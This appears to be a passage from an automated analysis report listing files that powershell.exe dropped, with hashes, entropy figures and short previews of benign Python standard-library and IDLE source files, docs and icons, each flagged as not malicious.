                                                                                                                                                                                                                      Preview:"""HTTP server classes.....Note: BaseHTTPRequestHandler doesn't implement any HTTP request; see..SimpleHTTPRequestHandler for simple implementations of GET, HEAD and POST,..and CGIHTTPRequestHandler for CGI scripts.....It does, however, optionally implement HTTP/1.1 persistent connections,..as of version 0.3.....Notes on CGIHTTPRequestHandler..------------------------------....This class implements GET and POST requests to cgi-bin scripts.....If the os.fork() function is not present (e.g. on Windows),..subprocess.Popen() is used as a fallback, with slightly altered semantics.....In all cases, the implementation is intentionally naive -- all..requests are executed synchronously.....SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL..-- it may execute arbitrary Python code or external programs.....Note that status code 200 is sent prior to execution of a CGI script, so..scripts cannot send other status codes such as 302 (redirect).....XXX To do:....- log requests even
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2199
                                                                                                                                                                                                                      Entropy (8bit):4.891065177371664
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:XvFiKKSXraFoqYiXS9d/h0GSZUUXjZQYyfqRt+uVbC1NNXQA0xc:XNp7tqYmSmGSZUUOQnbeNNXD3
                                                                                                                                                                                                                      MD5:F67AF7FD8CE6A6377E35438A66DD99BC
                                                                                                                                                                                                                      SHA1:BC63D70FEA6E148375153F594DBA409A35683C59
                                                                                                                                                                                                                      SHA-256:CBBDA5B891DA47D37567E28733E1049130820C572CC43D26C17A1488BA7721D5
                                                                                                                                                                                                                      SHA-512:A95AAF96262B83900636D55575E4DC7E8DFCFDD257DB462323D601F2D720FF19E07885AC7CC13992E9F534693AE42616A1CC5DA88AB20B7D85841087F8F9357D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:Guido van Rossum, as well as being the creator of the Python language, is the..original creator of IDLE. Other contributors prior to Version 0.8 include..Mark Hammond, Jeremy Hylton, Tim Peters, and Moshe Zadka.....Until Python 2.3, IDLE's development was carried out in the SF IDLEfork project. The..objective was to develop a version of IDLE which had an execution environment..which could be initialized prior to each run of user code...IDLefork was merged into the Python code base in 2003.....The IDLEfork project was initiated by David Scherer, with some help from Peter..Schneider-Kamp and Nicholas Riley. David wrote the first version of the RPC..code and designed a fast turn-around environment for VPython. Guido developed..the RPC code and Remote Debugger currently integrated in IDLE. Bruce Sherwood..contributed considerable time testing and suggesting improvements.....Besides David and Guido, the main developers who were active on IDLEfork..are Stephen M. Gava, who implemented th
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (573), with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):57951
                                                                                                                                                                                                                      Entropy (8bit):5.181417187054118
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:DBUthcU0dh7J3DmWwyOyXRinU4kAjLQr3v5MFZmTQiUb0DB87fRhSQ0c8eeYIjIv:V5AxpMK4057PSn/YSIN9
                                                                                                                                                                                                                      MD5:284F4D79C220ACF4D5F6310555146371
                                                                                                                                                                                                                      SHA1:EF2FE85A7FE07F6D195E358FFF722AFF20F266C6
                                                                                                                                                                                                                      SHA-256:C4EBD1900BC9AAC681B38AFDFE01716194E2A50B23547817626023AF543B40CC
                                                                                                                                                                                                                      SHA-512:EDB5E8C93F9403645E9AC459CE0DE2A35929B6F4AE065CCEE286D1C70CE65C35F9ED4F007377BF1250D86B2FE4E06CE289023EDC18FA796642115FB515E10DC9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:Please refer to the IDLEfork and IDLE CVS repositories for..change details subsequent to the 0.8.1 release.......IDLEfork ChangeLog..==================....2001-07-20 11:35 elguavas.....* README.txt, NEWS.txt: bring up to date for 0.8.1 release....2001-07-19 16:40 elguavas.....* IDLEFORK.html: replaced by IDLEFORK-index.html....2001-07-19 16:39 elguavas.....* IDLEFORK-index.html: updated placeholder idlefork homepage....2001-07-19 14:49 elguavas.....* ChangeLog, EditorWindow.py, INSTALLATION, NEWS.txt, README.txt,...TODO.txt, idlever.py:...minor tidy-ups ready for 0.8.1 alpha tarball release....2001-07-17 15:12 kbk.....* INSTALLATION, setup.py: INSTALLATION: Remove the coexist.patch...instructions.....**************** setup.py:.....Remove the idles script, add some words on IDLE Fork to the...long_description, and clean up some line spacing.....2001-07-17 15:01 kbk.....* coexist.patch: Put this in the attic, at least for now.......2001-07-17 14:59 kbk.....* PyShell.py, idle, idle
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):10608
                                                                                                                                                                                                                      Entropy (8bit):4.854985447088494
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:4cDFuKiDnJR0ciXDlNmSY0OUiVgs9ZWZy/nW:rUKibJuLXD3ZiVgsrax
                                                                                                                                                                                                                      MD5:3AC5395513EAAE1C6C23CDB840BF592C
                                                                                                                                                                                                                      SHA1:034D726D0509C2219803606B019D99F2B6887AD7
                                                                                                                                                                                                                      SHA-256:A84B2AC9C29304CEB63A7514912A7050F0B54AF7F0EB520B5EC8CBAF009CBAE1
                                                                                                                                                                                                                      SHA-512:3CBCD1DF450988CD3D20DE9F688953619FF624C5CCFF57FC9F6038988D34E0B349CDC1497666E164FE09DC6FD44A503BBB2BD52D1A1EEA2455620EE1C3C5E66E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:IDLE History..============....This file contains the release messages for previous IDLE releases...As you read on you go back to the dark ages of IDLE's history.......What's New in IDLEfork 0.8.1?..=============================....*Release date: 22-Jul-2001*....- New tarball released as a result of the 'revitalisation' of the IDLEfork.. project.....- This release requires python 2.1 or better. Compatibility with earlier.. versions of python (especially ancient ones like 1.5x) is no longer a.. priority in IDLEfork development.....- This release is based on a merging of the earlier IDLE fork work with current.. cvs IDLE (post IDLE version 0.8), with some minor additional coding by Kurt.. B. Kaiser and Stephen M. Gava.....- This release is basically functional but also contains some known breakages,.. particularly with running things from the shell window. Also the debugger is.. not working, but I believe this was the case with the previous IDLE fork.. release (0.7.1) as well.....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 15 x 13
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):120
                                                                                                                                                                                                                      Entropy (8bit):5.716614866135366
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:CCHaRRhtldzJ3VQHDtVuI5BIvkCdoIRzen:1HaRRhtJ2jttgwIRy
                                                                                                                                                                                                                      MD5:56C144CAA9A420C26A47106A53C9D530
                                                                                                                                                                                                                      SHA1:BD3C46DF953AB712C847D12D03BC3F6BAC4FA0B3
                                                                                                                                                                                                                      SHA-256:7C98D566A13FD599D1C11A375F387FEF69B6C595C4F18C5D88C188A860BE0E55
                                                                                                                                                                                                                      SHA-512:D56811661E3BDAED08281DEEDC289FDCF91C5DF62F759C4DD5DBC28AD37F0ADFF1D5B2C8EBB99AFDFE40F6E417781757A7EF8A08123075FFF4367CAA5C223708
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:GIF89a....................`.........!.......,........@.=xW.P......b...w.di....D.,.Xi.e......G..+.)...\....s.aYY...;
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:MS Windows icon resource - 4 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):57746
                                                                                                                                                                                                                      Entropy (8bit):7.552936064286507
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:DfHn5T82s45tlDqwIdvKKBLutvfFoV/XUuT:DfH5TZsYnjIdbCNNoV/Xl
                                                                                                                                                                                                                      MD5:18FE30F810364BD33C396C9EE428F4B4
                                                                                                                                                                                                                      SHA1:362433117F9E00A8DA6CB54FCD81365FE0168566
                                                                                                                                                                                                                      SHA-256:7F13EEB5DCA39D05E24B9EB069C6DCB2748633822D67288A8BF8B7E21CDDDF55
                                                                                                                                                                                                                      SHA-512:160147777466016B908A1A663E3457ED8DC6D0D4C3BB6E75B54206A3E84E8462F1CDDF3F23A248D8CBEA079615F5F58C4488E016DBDDE04B9A0A03DB9CE70660
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:............ .h...F... .... .........00.... ..%..V......... ......:..(....... ..... ........................................................C...................................o...............I..........................................................................S...=...?..................................................._...Q...F.......4...............................................a...Z...................................................oE.....c...a...X...M...B...7...0............................~I..q?.........c...`...V...K...@...5...8........................z;..u=...q.....................v...>...3.........................E..y<..t>..n@..iB.~dE.}dF.........G...H............................=..x<..s>..mA..hC.}dE.}eG.....S....................................................gC.}cE..............................................~>......q?..kA..iG..................................................G..u=..xK..........................................................................
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 16 x 16
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):634
                                                                                                                                                                                                                      Entropy (8bit):6.407453967267006
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:6jbjJ2FBcRGqQ4FEmmv5+KLNv44xxJMaTL+zX:A/JiBcRGhsfs+KpvfxxDTgX
                                                                                                                                                                                                                      MD5:B5ACB2F5716246C18B880E17FD57668F
                                                                                                                                                                                                                      SHA1:220ECCCAB2E260FF5EE9691DD929C40319A9A35D
                                                                                                                                                                                                                      SHA-256:FE3AF292B38660A8A58B1A8B4FA4240AA190602E7E9A700EA0536B3181FC968E
                                                                                                                                                                                                                      SHA-512:FEE7AC2B102C675F80AD54C36F45A33A2EA6EE5DB07987B435B3F55D4A43C7B250CBBD8AB1AF835404631AB138C69166CEAB89CF438A3F63F56DF7C8EC6B8A04
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:GIF89a.....W.Ec}Ge}Ed~..0..3..5..8..?..=..>..B..G..H..M..S..Q..V..Z.._..`..c..v?q.=u.;z.>~.Cg.Gi.Bi.Ak.Eo.@n.Kx.I~.=..G..E..q........................................................................................................................................................................................................................................................................!.....W.,............0.<<==?.W..0@HQRRTSV?S@.W0CQSCHKFU.UK.=AHUGKRV;#. 8U.>FSUQUVU.E....W?AIUC..U:...>.SQ;". ....U.5>..$.....'L..<.QV.!%M.L...1.OV!...0.B............P... ..2\.1...).7J.j!...$I.Ix..H.b+z.P....)6.$80...+(V."..Q.(R.....;
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PNG image data, 16 x 16, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1031
                                                                                                                                                                                                                      Entropy (8bit):7.290880187356763
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:CSNFWMUpnAXA2Oh4kBMD2Ki11/xzsEMwo:HgbEA2Oh4ks23YEto
                                                                                                                                                                                                                      MD5:0A955F5C7A91A3E9991ED15C7B63481C
                                                                                                                                                                                                                      SHA1:1BAF3808347CBA5953055D98544CE587449AB78B
                                                                                                                                                                                                                      SHA-256:78FB3FB0EC11F61BC6CF0947F3C3923AA18E1C6513684058ED0FA01AC858143E
                                                                                                                                                                                                                      SHA-512:F9B9840651381232427FB88F47366C5C5AED07C986C6D464D3DA40DB89917F60D650D67D20122506526EAF3CA88A72D1956EF83969659E0137E58C42906C9D0A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.PNG........IHDR.............(-.S....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE............................................................................................................................................................................G..=u.Kx.......>~....?q.Ak.Gi.........Cg.Ec}...=..<x.>s.Am.Ch.Ed}Ge}..S........E..<y.>t.@n.Bi.Ed~Fd}........G..H......;z.=u.q.......v..>..3...I~......c..`..V..K..@..5..8....Eo...a..X..M..B..7..0.................a..Z.................._..Q..F.....4.......S..=..?.......t.......tRNS.............o..I...C....H_'.....bKGD...L.....pHYs...H...H.F.k>....tIME.........}P....IDAT.....#.q.......5ott...6...l..{%d..y=...FS.g.Xm........(IN.\...e.Ev..r........Y..........Gd..........j>..Q[{..u.{.I..........!..."....OLNM.ff1...iaq)HD..U....[..7B.[.;.{0..}...BG.'.g...._E"2..["..#zw........-..;........_.?).R......../..r...../(,....N;*f.Cn...%tEXtdate:create.2020-07-01T09:30:04+00:00..4....%tEXtdate:modify.2020-07-01
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):39205
                                                                                                                                                                                                                      Entropy (8bit):7.932952252158766
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:yW9tzpMpR83msk78azqlmoIi9nghI7d8JN64LDGJv7Hr1rb:JJpIRKHkQamQiy4d8JNuv7HJrb
                                                                                                                                                                                                                      MD5:348157239DCB7DC7B13B28937BE025B3
                                                                                                                                                                                                                      SHA1:9D6503BF06F2F9632D36EDCB4C93EBAC7827AB0A
                                                                                                                                                                                                                      SHA-256:3F517467D12E0E3ECF20F9BD68CE4BD18A2B8088F32308FD978FD80E87D3628B
                                                                                                                                                                                                                      SHA-512:82A40C0563E4D6273B6B1BE8BFDD46E5E455627C13391F97EA900D198AC405ED68E4A31A98ECA9E0CF2C5295DA5221B96904998F9F3D4FB9B9CC826692F039E8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.PNG........IHDR.............\r.f....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME........].....IDATx..w..gy.....B.)Ix...1.&....)qH0N....M.....!`0.Ms/..;;.W.Fm..s.{.w...4...c..4..]..J.\gGZ.fFz>....*......E..e-...b..>.....w..eg`.[..\O.la.....E.a.Zv....E..r-....`....(..X.Z.....E}...?.\G. ..%..K..]]].~........+++..\..+.J..".....+.....<r.........l6...e.r..t:..F.sf........E}....CQ..S.uI...B.. .....r..X>.?c..Pwk...n....Z5..V.).e#0..,2..2....4R....$.....8b....("..B.... ....~?.^/.^/.n7\......v;l6.,...F#4..d2.D"..R)t:..^/.......t:......EQWTV...........>...@..j..j[.......Z.h1...B...6......V..T...yp.\p8.,,, ...\.cuu..tZ../~....++..Q.....~..Y.....Wo&.-.w.~.e{.R.LD .....#.:..2..sss`2.........N'.]....B..Y..........}".....A.+...?.........:t..3.p..Z......@...................}___..j.(.Z...........X.....k.....S.u/EQ.S.u.M7..`$....|.Z.x<..B.t:.|>..X\.o:..R.D"..V.%.w*..R....[,.d....^..W..W/.Z..<......\..l......F.....d2Y...V".....7..T*....FG
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1019
                                                                                                                                                                                                                      Entropy (8bit):7.550904016954338
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:3UTv87imj5HoeB/VVRxDqlmacARle9iEhdLHItE:3Yvkjme1VVRvacSM9lgO
                                                                                                                                                                                                                      MD5:B57EF092C3A64872BDD3D01DF0F7D503
                                                                                                                                                                                                                      SHA1:132C41F2ED44FADCDE2B4B3F136E7E8CF95951D0
                                                                                                                                                                                                                      SHA-256:FE70991CFCCD1267922E94D91E02E9A58D2D29FD3382A2F4975280B9023CB7B9
                                                                                                                                                                                                                      SHA-512:58DC3A5888B8DB7320E390CB7A2EA46E98FC5804F0B6881CF085AE463C7FC4517F4FAC040CC694498EC55B8353EFCACA3D17B5040A7473A82E07464943ADC582
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:GIF89a . ....Ec|Fd}bbb..%..(..+..+.....1..2..3..6..7..<..?..:..=..=..A..B..E..F..H..J..K..L..M..Y..\..P..\..Q..U..V..X..[.._..r..g..`..b..v?q.?q.?r.>s.>s.=v.=v.=v.=w.<x.;{.:|.:}.:}.:}.9..Df.Df.Cg.Ci.Bk.Ak.Al.Am.@n.@o.Y~.Fy.C~.9..8..i..V..A..m..p..?..P..P..k..i.....................................................................................................................................!.......,.... . .............|..~..xr^`]..|.{brrbn{rnb^Vx`....|.pa.Vnr_....|.~.~{_p....~.|bttp..`x[VpS.....~`.[p]T....apW..~r.rxxp..__^..^..na_n....... J....cK..Ez..7...:r.=....5<.....F..>tN...M.%5f.(.$M.Z....I..5hd.P1...A.Y.sq.;.G..Qd...=..+..Y.0a.h.....V.....B.z........-jy..6..=a.......$9n.Q5...:.~...LRL....#....C......?.*L(A......89b.F..*.. ......"@....1?Gn......I.._...k:]..)+.E.;... ...x..G..Fw.w...?"..."<0O.. vr.A..F....~..."|....<..............1.....pB..E8...l@Mz..(G.u....A$8"..Q..u...@..F..`...2(..cX.v... rl..^..E.\.... tpA~.w.6r0...pt...~....e.a@[..I..aTQ..%JH....).0
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):9582
                                                                                                                                                                                                                      Entropy (8bit):4.3788666144076105
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:NHJWAibAZ3vIggkEfc54pjuXv+e3ZLbaQBYDAWa:NHJWAibAp8E54Nqv+g0Ax
                                                                                                                                                                                                                      MD5:24D5CA8A7B072FE0524D2009A422F84D
                                                                                                                                                                                                                      SHA1:C7F057B1B9B6473FB9D54D09CC7D650A6ADB5466
                                                                                                                                                                                                                      SHA-256:D6863E5703612857B03BC44CE9E5C591B24BBAA02EADE5900664E9D87217DF10
                                                                                                                                                                                                                      SHA-512:0E282AD040D11CDB600B62DDFEFCDF6EB7255C1308546F417F678809EB5009BBA19D5F67431FBFF752A666CF9550F3F33558A47D0C8B2C29888F5B8E13503E46
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Complete either attribute names or file names.....Either on demand or after a user-selected delay after a key character,..pop up a list of candidates..."""..import __main__..import keyword..import os..import string..import sys....# Modified keyword list is used in fetch_completions...completion_kwds = [s for s in keyword.kwlist.. if s not in {'True', 'False', 'None'}] # In builtins...completion_kwds.extend(('match', 'case')) # Context keywords...completion_kwds.sort()....# Two types of completions; defined here for autocomplete_w import below...ATTRS, FILES = 0, 1..from idlelib import autocomplete_w..from idlelib.config import idleConf..from idlelib.hyperparser import HyperParser....# Tuples passed to open_completions...# EvalFunc, Complete, WantWin, Mode..FORCE = True, False, True, None # Control-Space...TAB = False, True, True, None # Tab...TRY_A = False, False, False, ATTRS # '.' for attributes...TRY_F = False, Fal
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):21361
                                                                                                                                                                                                                      Entropy (8bit):4.539417169910206
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:Op3Uer4VcMKcW+1kv3iBgFVVIVOTym/wucFEG/r62/uYxy91a/4af/uNTjKfM/A4:Op3Ue21qKBgFkOTUfO1Yok4Vs0xn
                                                                                                                                                                                                                      MD5:FE13E7068C967CC9FF5669BE6D205A45
                                                                                                                                                                                                                      SHA1:0AEBB8052D43C950DC16717945713CB2B2AB4EC9
                                                                                                                                                                                                                      SHA-256:3D88D2B736871D3302CF31EAF785D02C0A2D9ACD4B23F1B088857BBD2F2BAFA8
                                                                                                                                                                                                                      SHA-512:70C5536E3C044B9DD579EFC483FA900EBFEEA83A69E4A86559F5A2FFC12F0EBA0D47770ABDBF1AAF1EF16B4B5C383B9C0186DA6EC9A3B87A1CB8319D7ABB0176
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""..An auto-completion window for IDLE, used by the autocomplete extension.."""..import platform....from tkinter import *..from tkinter.ttk import Scrollbar....from idlelib.autocomplete import FILES, ATTRS..from idlelib.multicall import MC_SHIFT....HIDE_VIRTUAL_EVENT_NAME = "<<autocompletewindow-hide>>"..HIDE_FOCUS_OUT_SEQUENCE = "<FocusOut>"..HIDE_SEQUENCES = (HIDE_FOCUS_OUT_SEQUENCE, "<ButtonPress>")..KEYPRESS_VIRTUAL_EVENT_NAME = "<<autocompletewindow-keypress>>"..# We need to bind event beyond <Key> so that the function will be called..# before the default specific IDLE function..KEYPRESS_SEQUENCES = ("<Key>", "<Key-BackSpace>", "<Key-Return>", "<Key-Tab>",.. "<Key-Up>", "<Key-Down>", "<Key-Home>", "<Key-End>",.. "<Key-Prior>", "<Key-Next>", "<Key-Escape>")..KEYRELEASE_VIRTUAL_EVENT_NAME = "<<autocompletewindow-keyrelease>>"..KEYRELEASE_SEQUENCE = "<KeyRelease>"..LISTUPDATE_SEQUENCE = "<B1-ButtonRelease>"..WINCONFIG_SEQUENCE = "<Configure>
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3312
                                                                                                                                                                                                                      Entropy (8bit):4.279209000194862
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:2HKgz99V1AqotPoGbuGpMM+LEFsuIpqD/cIZMNsHFNjL6EFbStFsHBM5sZ+VMabi:2LzXV1AquP3l+xczTLo6oHyaXtitFRj
                                                                                                                                                                                                                      MD5:3630277C433B2C3C1E20ADD3DCC40D47
                                                                                                                                                                                                                      SHA1:0C75883D09F33A3A4B19EC4827FEF1224F55687E
                                                                                                                                                                                                                      SHA-256:EEC10FFD8D460FB90AAA61FB286F25F982793DF124A55D52A92B34A0B15C3F4C
                                                                                                                                                                                                                      SHA-512:4CB79DFB8C7017CD46127B352B06BD8DC29E47CD87B599D1C2BFF5FF0F13DC17945075F00D4AF9DF290346D433851F186330E2F5AE3D2C65F8627A1253C24696
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:'''Complete the current word before the cursor with words in the editor.....Each menu selection or shortcut key selection replaces the word with a..different word with the same prefix. The search for matches begins..before the target and moves toward the top of the editor. It then starts..after the cursor and moves down. It then returns to the original word and..the cycle starts again.....Changing the current text line or leaving the cursor in a different..place before requesting the next selection causes AutoExpand to reset..its state.....There is only one instance of Autoexpand...'''..import re..import string......class AutoExpand:.. wordchars = string.ascii_letters + string.digits + "_".... def __init__(self, editwin):.. self.text = editwin.text.. self.bell = self.text.bell.. self.state = None.... def expand_word_event(self, event):.. "Replace the current word with the next expansion.".. curinsert = self.text.index("insert").. curli
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8848
                                                                                                                                                                                                                      Entropy (8bit):4.482264147714743
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:UeViezbUGVbdUMKb/8bTzlPXUqVlYDwOKjAbmputuyLWv9LKH6uAStRw7dv:Uu3DUx0bT1nYDTQLHVKRASTGl
                                                                                                                                                                                                                      MD5:2117516807ED2A852A294579D24D1E9A
                                                                                                                                                                                                                      SHA1:EC0B31850734EBFDBAB0A42A270198FF555EDBD4
                                                                                                                                                                                                                      SHA-256:9B7FB874BDC94408D6B3A8579235783C53EB56EEA39B43C6C81B24290CC9D3C2
                                                                                                                                                                                                                      SHA-512:6F11524C67CA287723F8DA12763156C065BD6FA1A080816BC848E9F9518AC52D6633C6BF67CA15293ED5CFBB00952E8FCD3AB249A2C823B58C2ABF0189DF5591
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Module browser.....XXX TO DO:....- reparse when source changed (maybe just a button would be OK?).. (or recheck on window popup)..- add popup menu with more options (e.g. doc strings, base classes, imports)..- add base classes to class browser tree.."""....import os..import pyclbr..import sys....from idlelib.config import idleConf..from idlelib import pyshell..from idlelib.tree import TreeNode, TreeItem, ScrolledCanvas..from idlelib.util import py_extensions..from idlelib.window import ListedToplevel......file_open = None # Method...Item and Class...Item use this...# Normally pyshell.flist.open, but there is no pyshell.flist for htest.....# The browser depends on pyclbr and importlib which do not support .pyi files...browseable_extension_blocklist = ('.pyi',)......def is_browseable_extension(path):.. _, ext = os.path.splitext(path).. ext = os.path.normcase(ext).. return ext in py_extensions and ext not in browseable_extension_blocklist......def transform_children(child_
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7472
                                                                                                                                                                                                                      Entropy (8bit):4.503050253535362
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:buoYb91LYFSc1ynoGbGeUuw1oyEQrb70CLaghdrA+O6SjnD+E/OFaUiI+DFqSXLS:dMLy31yFGjuk3FLrrAf6SjjlI+BTXLQ5
                                                                                                                                                                                                                      MD5:CDB87B1F5E3DB590CBA8293ECB7E785A
                                                                                                                                                                                                                      SHA1:525FEBCDE7F56C32581435C94BDF391ECB941DC5
                                                                                                                                                                                                                      SHA-256:7E24FC65B0DFE9B0ABFBB0DEA97AB222098AA978F85F2E79A2AC56FF92F5BB2A
                                                                                                                                                                                                                      SHA-512:F9F79956160FF780D1E2B3D6E1FBA6932A1D42EBA31CE576FE6759E92DD3BCC62C496683F711070F23EA4D568B6FF9917E41A4C4364F2A26FD9D31511F595E2B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Pop up a reminder of how to call a function.....Call Tips are floating windows which display function, class, and method..parameter and docstring information when you type an opening parenthesis, and..which disappear when you type a closing parenthesis..."""..import __main__..import inspect..import re..import sys..import textwrap..import types....from idlelib import calltip_w..from idlelib.hyperparser import HyperParser......class Calltip:.... def __init__(self, editwin=None):.. if editwin is None: # subprocess and test.. self.editwin = None.. else:.. self.editwin = editwin.. self.text = editwin.text.. self.active_calltip = None.. self._calltip_window = self._make_tk_calltip_window.... def close(self):.. self._calltip_window = None.... def _make_tk_calltip_window(self):.. # See __init__ for usage.. return calltip_w.CalltipWindow(self.text).... def remove_calltip_window(self, event=
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7285
                                                                                                                                                                                                                      Entropy (8bit):4.700925314709351
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:IwjFN1CkcBxptGCkQwSuHGrcqbOi4r8qcWU5IlUR:l5wfJlpCzhO
                                                                                                                                                                                                                      MD5:3AA49E1E083600C254CC62E018E1E8A7
                                                                                                                                                                                                                      SHA1:8D5ACD1BBAF557D5E92E6D9387676B0D29E37AF9
                                                                                                                                                                                                                      SHA-256:1476595EF18D6ADF82D23B435354968683F4099A88FCDB2D814706DA3E3CA4FB
                                                                                                                                                                                                                      SHA-512:776643010F0D616F3CBD6D2CF33A590782ABC7BB3C2612434B6884EEBDFDDCAEAB27F5B675554251732028AE5CB79324756189F5905A012F3A22AC0CFD4E140C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""A call-tip window class for Tkinter/IDLE.....After tooltip.py, which uses ideas gleaned from PySol...Used by calltip.py..."""..from tkinter import Label, LEFT, SOLID, TclError....from idlelib.tooltip import TooltipBase....HIDE_EVENT = "<<calltipwindow-hide>>"..HIDE_SEQUENCES = ("<Key-Escape>", "<FocusOut>")..CHECKHIDE_EVENT = "<<calltipwindow-checkhide>>"..CHECKHIDE_SEQUENCES = ("<KeyRelease>", "<ButtonRelease>")..CHECKHIDE_TIME = 100 # milliseconds....MARK_RIGHT = "calltipwindowregion_right"......class CalltipWindow(TooltipBase):.. """A call-tip widget for tkinter text widgets.""".... def __init__(self, text_widget):.. """Create a call-tip; shown by showtip()..... text_widget: a Text widget with code for which call-tips are desired.. """.. # Note: The Text widget will be accessible as self.anchor_widget.. super().__init__(text_widget).... self.label = self.text = None.. self.parenline = self.parencol = self.lastline = None..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
